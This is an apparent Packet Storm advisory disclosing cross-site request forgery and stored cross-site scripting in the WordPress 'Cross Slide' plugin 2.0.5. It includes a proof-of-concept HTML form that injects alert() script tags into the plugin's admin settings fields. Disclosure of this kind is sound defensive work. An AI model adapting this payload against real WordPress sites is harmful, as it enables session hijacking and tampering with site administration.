WordPress Cross Slide plugin version 2.0.5 suffers from cross site request forgery and cross site scripting vulnerabilities.
caa03a6c9a143215c1d4269bc414496575d0db2bc33a311b7242be9b1c50217cTitle: WordPress 'Cross Slide' plugin - XSS/CSRF
Version: 2.0.5
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2015/01/26
Download: https://wordpress.org/plugins/crossslide-jquery-plugin-for-wordpress/
Contacted WordPress: 2015/01/26
==========================================================
## Plugin description:
==========================================================
The CrossSlide jQuery plugin for WordPress is designed to quickly add the JS and CSS requirements to operate the jQuery slideshow.
## CSRF:
==========================================================
It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page.
## Stored XSS:
==========================================================
Settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields.
PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=thisismyurl_csj.php">
<input type="text" name="csj_width" value="800"/><script>alert(1)</script>"><br />
<input type="text" name="csj_height" value="800"/><script>alert(2)</script>"><br />
<input type="text" name="csj_sleep" value="800"/><script>alert(3)</script>"><br />
<input type="text" name="csj_fade" value="800"/><script>alert(4)</script>"><br />
<input type="text" name="upload_image" value="800"/><script>alert(5)</script>"><br />
<input type="submit">
</form>
## Solution
==========================================================
No fix available.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed